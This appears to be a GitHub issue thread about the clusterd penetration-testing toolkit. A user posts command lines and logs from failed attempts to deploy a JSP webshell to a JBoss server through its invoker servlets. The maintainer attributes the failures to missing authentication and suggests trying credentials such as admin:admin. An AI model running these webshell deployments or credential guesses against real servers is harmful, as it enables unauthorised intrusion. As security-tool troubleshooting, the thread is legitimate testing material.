JMX Deployment Issues
Meatballs1 opened this issue · 4 comments
Meatballs1 commented
Was unable to work against a version of JMX, not sure why:
root@kali:~/git/clusterd# ./clusterd.py -i x -p 8000 --fingerprint --deploy /usr/share/webshells/jsp/cmdjsp.jsp --deployer ejbinvokerservlet
clusterd/0.3 - clustered attack toolkit
[Supporting 6 platforms]
[2014-05-16 11:51AM] Started at 2014-05-16 11:51AM
[2014-05-16 11:51AM] Servers' OS hinted at windows
[2014-05-16 11:51AM] Fingerprinting host 'x'
[2014-05-16 11:51AM] Checking jboss version 3.2 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 3.2 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 3.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 4.2 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 4.2 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 4.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 4.0 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 5.1 JBoss Web Manager...
[2014-05-16 11:51AM] Checking jboss version 5.1 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 5.1 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 5.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 5.0 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 6.0 JBoss Web Manager...
[2014-05-16 11:51AM] Checking jboss version 6.1 JBoss Web Manager...
[2014-05-16 11:51AM] Checking jboss version 6.1 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 6.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 7.1 JBoss Management...
[2014-05-16 11:51AM] Checking jboss version 7.0 JBoss Management...
[2014-05-16 11:51AM] Checking jboss version 8.0 JBoss Management...
[2014-05-16 11:51AM] Checking jboss version Any JBoss EJB Invoker Servlet...
[2014-05-16 11:51AM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
[2014-05-16 11:51AM] Checking jboss version Any JBoss JMX Invoker Servlet...
[2014-05-16 11:51AM] Checking jboss version Any JBoss RMI Interface...
[2014-05-16 11:51AM] Checking jboss version Any JBoss Status Page...
[2014-05-16 11:51AM] Matched 4 fingerprints for service jboss
[2014-05-16 11:51AM] JBoss EJB Invoker Servlet (version Any)
[2014-05-16 11:51AM] JBoss HTTP Headers (Unreliable) (version 5.0)
[2014-05-16 11:51AM] JBoss JMX Invoker Servlet (version Any)
[2014-05-16 11:51AM] JBoss Status Page (version Any)
[2014-05-16 11:51AM] Fingerprinting completed.
[2014-05-16 11:51AM] Preparing to deploy /usr/share/webshells/jsp/cmdjsp.jsp...
Invocation Exception
org.jboss.invocation.InvocationException
at org.jboss.invocation.http.servlet.InvokerServlet.processRequest(InvokerServlet.java:188)
at org.jboss.invocation.http.servlet.InvokerServlet.doPost(InvokerServlet.java:224)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:637)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:235)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:191)
at org.jboss.web.tomcat.security.SecurityAssociationValve.invoke(SecurityAssociationValve.java:190)
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:433)
at org.jboss.web.tomcat.security.JaccContextValve.invoke(JaccContextValve.java:92)
at org.jboss.web.tomcat.security.SecurityContextEstablishmentValve.process(SecurityContextEstablishmentValve.java:126)
at org.jboss.web.tomcat.security.SecurityContextEstablishmentValve.invoke(SecurityContextEstablishmentValve.java:70)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)
at org.jboss.web.tomcat.service.jca.CachedConnectionValve.invoke(CachedConnectionValve.java:158)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:109)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:330)
at org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:829)
at org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:598)
at org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:447)
at java.lang.Thread.run(Thread.java:619)
[2014-05-16 11:51AM] Finished at 2014-05-16 11:51AM
root@kali:~/git/clusterd# ./clusterd.py -i x -p 8000 --fingerprint --deploy /usr/share/webshells/jsp/cmdjsp.jsp --deployer jmxinvokerservlet
clusterd/0.3 - clustered attack toolkit
[Supporting 6 platforms]
[2014-05-16 11:51AM] Started at 2014-05-16 11:51AM
[2014-05-16 11:51AM] Servers' OS hinted at windows
[2014-05-16 11:51AM] Fingerprinting host 'x'
[2014-05-16 11:51AM] Checking jboss version 3.2 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 3.2 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 3.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 4.2 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 4.2 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 4.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 4.0 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 5.1 JBoss Web Manager...
[2014-05-16 11:51AM] Checking jboss version 5.1 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 5.1 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 5.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 5.0 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 6.0 JBoss Web Manager...
[2014-05-16 11:51AM] Checking jboss version 6.1 JBoss Web Manager...
[2014-05-16 11:51AM] Checking jboss version 6.1 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 6.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 7.1 JBoss Management...
[2014-05-16 11:51AM] Checking jboss version 7.0 JBoss Management...
[2014-05-16 11:51AM] Checking jboss version 8.0 JBoss Management...
[2014-05-16 11:51AM] Checking jboss version Any JBoss EJB Invoker Servlet...
[2014-05-16 11:51AM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
[2014-05-16 11:51AM] Checking jboss version Any JBoss JMX Invoker Servlet...
[2014-05-16 11:51AM] Checking jboss version Any JBoss RMI Interface...
[2014-05-16 11:51AM] Checking jboss version Any JBoss Status Page...
[2014-05-16 11:51AM] Matched 4 fingerprints for service jboss
[2014-05-16 11:51AM] JBoss EJB Invoker Servlet (version Any)
[2014-05-16 11:51AM] JBoss HTTP Headers (Unreliable) (version 5.0)
[2014-05-16 11:51AM] JBoss JMX Invoker Servlet (version Any)
[2014-05-16 11:51AM] JBoss Status Page (version Any)
[2014-05-16 11:51AM] Fingerprinting completed.
[2014-05-16 11:51AM] Preparing to deploy /usr/share/webshells/jsp/cmdjsp.jsp...
Exception in thread "main" java.lang.ClassNotFoundException: javax.servlet.ServletException
at java.net.URLClassLoader$1.run(URLClassLoader.java:217)
at java.security.AccessController.doPrivileged(Native Method)
at java.net.URLClassLoader.findClass(URLClassLoader.java:205)
at java.lang.ClassLoader.loadClass(ClassLoader.java:323)
at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:294)
at java.lang.ClassLoader.loadClass(ClassLoader.java:268)
at java.lang.Class.forName0(Native Method)
at java.lang.Class.forName(Class.java:270)
at java.io.ObjectInputStream.resolveClass(ObjectInputStream.java:624)
at org.jboss.invocation.MarshalledValueInputStream.resolveClass(MarshalledValueInputStream.java:109)
at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1611)
at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1516)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1770)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1349)
at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:1989)
at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1914)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1797)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1349)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:369)
at org.jboss.invocation.MarshalledValue.get(MarshalledValue.java:91)
at invkdeploy.main(invkdeploy.java:151)
[2014-05-16 11:51AM] Finished at 2014-05-16 11:51AM
The metasploit 'check' function identified it as SVNTag=JBoss_5_but also failed :)
Meatballs1 commented
NB If I specify the generated war file instead I dont get prompted to use cmd.jsp as per readme...
[2014-05-16 12:01PM] JBoss EJB Invoker Servlet (version Any)
[2014-05-16 12:01PM] JBoss HTTP Headers (Unreliable) (version 5.0)
[2014-05-16 12:01PM] JBoss JMX Invoker Servlet (version Any)
[2014-05-16 12:01PM] JBoss Status Page (version Any)
[2014-05-16 12:01PM] Fingerprinting completed.
[2014-05-16 12:01PM] Preparing to deploy shell.war...
[2014-05-16 12:01PM] This deployer requires a JSP payload
[2014-05-16 12:01PM] Finished at 2014-05-16 12:01PM
Meatballs1 commented
[2014-05-16 12:04PM] Loading auxiliary for 'jboss'...
[2014-05-16 12:04PM] Loading deployers for platform jboss
[2014-05-16 12:04PM] Deploying WAR with deployer JBoss EJB Invoker Servlet (ejbinvokerservlet)
[2014-05-16 12:04PM] Preparing to deploy /usr/share/webshells/jsp/cmdjsp.jsp...
Invocation Exception
org.jboss.invocation.InvocationException
at org.jboss.invocation.http.servlet.InvokerServlet.processRequest(InvokerServlet.java:188)
at org.jboss.invocation.http.servlet.InvokerServlet.doPost(InvokerServlet.java:224)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:637)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:235)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:191)
at org.jboss.web.tomcat.security.SecurityAssociationValve.invoke(SecurityAssociationValve.java:190)
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:433)
at org.jboss.web.tomcat.security.JaccContextValve.invoke(JaccContextValve.java:92)
at org.jboss.web.tomcat.security.SecurityContextEstablishmentValve.process(SecurityContextEstablishmentValve.java:126)
at org.jboss.web.tomcat.security.SecurityContextEstablishmentValve.invoke(SecurityContextEstablishmentValve.java:70)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)
at org.jboss.web.tomcat.service.jca.CachedConnectionValve.invoke(CachedConnectionValve.java:158)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:109)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:330)
at org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:829)
at org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:598)
at org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:447)
at java.lang.Thread.run(Thread.java:619)
[2014-05-16 12:04PM] null
[2014-05-16 12:04PM] Using JSP /usr/share/webshells/jsp/cmdjsp.jsp from /usr/share/webshells/jsp/cmdjsp.jsp to invoke
[2014-05-16 12:04PM] Making GET request to http://10.221.0.17:8000/cmdjsp166166//usr/share/webshells/jsp/cmdjsp.jsp with arguments {'verify': False, 'timeout': 5.0}
[2014-05-16 12:04PM] Failed to invoke cmdjsp.jsp
[2014-05-16 12:04PM] Finished at 2014-05-16 12:04PM
Meatballs1 commented
I think the appliance it is installed on is patched :|
hatRiot commented
Hey @Meatballs1
Those exceptions look to be the result of failed/missing authentication. Currently, clusterd doesn't support brute forcing invoker servlets, but if you want to try and manually figure out the password (or bash script it) you can use the --usr-auth admin:admin
flag.
Support for brute forcing these interfaces is on the list though; thanks for the report!